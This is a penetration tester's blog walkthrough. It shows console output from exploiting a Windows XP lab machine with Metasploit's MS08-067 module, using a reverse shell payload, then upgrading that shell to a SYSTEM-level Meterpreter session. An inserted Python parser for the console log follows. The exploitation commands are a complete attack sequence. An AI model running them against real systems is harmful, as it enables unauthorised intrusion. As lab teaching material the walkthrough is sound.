Metasploit Meterpreter Command Shell Upgrade

Seeing is believing 🙂

root@bt:~# msfconsole
=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, the command shell is now in the background. What if we want to turn that existing command shell session into a Meterpreter session? Re-exploit? No need: Metasploit has a feature to upgrade a command shell session to a Meterpreter session; look at the -u option. Let's try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, the new Meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
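As an added example (not code from the original post), here is a small Python parser that reconstructs the upgrade timeline from msfconsole output like the one above: which shell session each Meterpreter session was upgraded from, how long the upgrade took, how many bytes the command stager pushed through the shell, and how large the stage was. This is the kind of reconstruction needed when writing up an engagement or reviewing an operator log. The sample text is a constructed excerpt of the console output shown on this page; the regular expressions are assumptions about the message format of that Metasploit version.

```python
import re
from datetime import datetime

# Constructed sample: an excerpt of the msfconsole output shown on this page.
SAMPLE = """\
[*] Started reverse handler on 192.168.96.1:443
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700
"""

# Assumed message formats (taken from the output above, not from Metasploit's source).
SESSION_RE = re.compile(
    r"\[\*\] (?P<type>Command shell|Meterpreter) session (?P<id>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d [+-]\d{4})")
STAGER_RE = re.compile(r"Command Stager progress - [\d.]+% done \((?P<sent>\d+)/(?P<total>\d+) bytes\)")
STAGE_RE = re.compile(r"Sending stage \((?P<size>\d+) bytes\) to (?P<rhost>[\d.]+)")

def parse_console(text):
    """Return (sessions, stager): session-open events and a summary of stager traffic."""
    sessions, stager = [], {"chunks": 0, "total": None, "stage_bytes": None}
    for line in text.splitlines():
        if m := SESSION_RE.search(line):          # search(): tolerate a leading prompt
            d = m.groupdict()
            d["id"] = int(d["id"])
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S %z")
            sessions.append(d)
        elif m := STAGER_RE.search(line):         # one line per chunk pushed via the shell
            stager["chunks"] += 1
            stager["total"] = int(m["total"])
        elif m := STAGE_RE.search(line):          # the Meterpreter stage itself
            stager["stage_bytes"] = int(m["size"])
    return sessions, stager

def upgrade_summary(text):
    """Pair each Meterpreter session with the latest earlier shell session on the same host."""
    sessions, stager = parse_console(text)
    shells = [s for s in sessions if s["type"] == "Command shell"]
    out = []
    for met in (s for s in sessions if s["type"] == "Meterpreter"):
        origin = max((s for s in shells if s["rhost"] == met["rhost"] and s["ts"] <= met["ts"]),
                     key=lambda s: s["ts"], default=None)
        out.append({"shell": origin["id"] if origin else None, "meterpreter": met["id"],
                    "seconds": (met["ts"] - origin["ts"]).total_seconds() if origin else None,
                    "stager_bytes": stager["total"], "stage_bytes": stager["stage_bytes"]})
    return out
```

Running `upgrade_summary(SAMPLE)` on the page's own output reports that session 2 was upgraded from session 1 in 40 seconds, with 102108 bytes pushed through the shell by the command stager and a 752128-byte stage delivered afterwards.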

Nice feature, good job Metasploit team 😉

modpr0be

I am currently the director and owner of PT Spentera, a company focused on penetration testing, incident response, intrusion analysis and forensic investigation.

I also contribute to the Metasploit Framework exploit repository as an exploit code developer. I currently hold the following certifications: Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001:2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), and Offensive Security Exploitation Expert (OSEE).

If you want to contact me, you can reach me by business email at tom at spentera dot id or personally at me at modpr0 dot be.
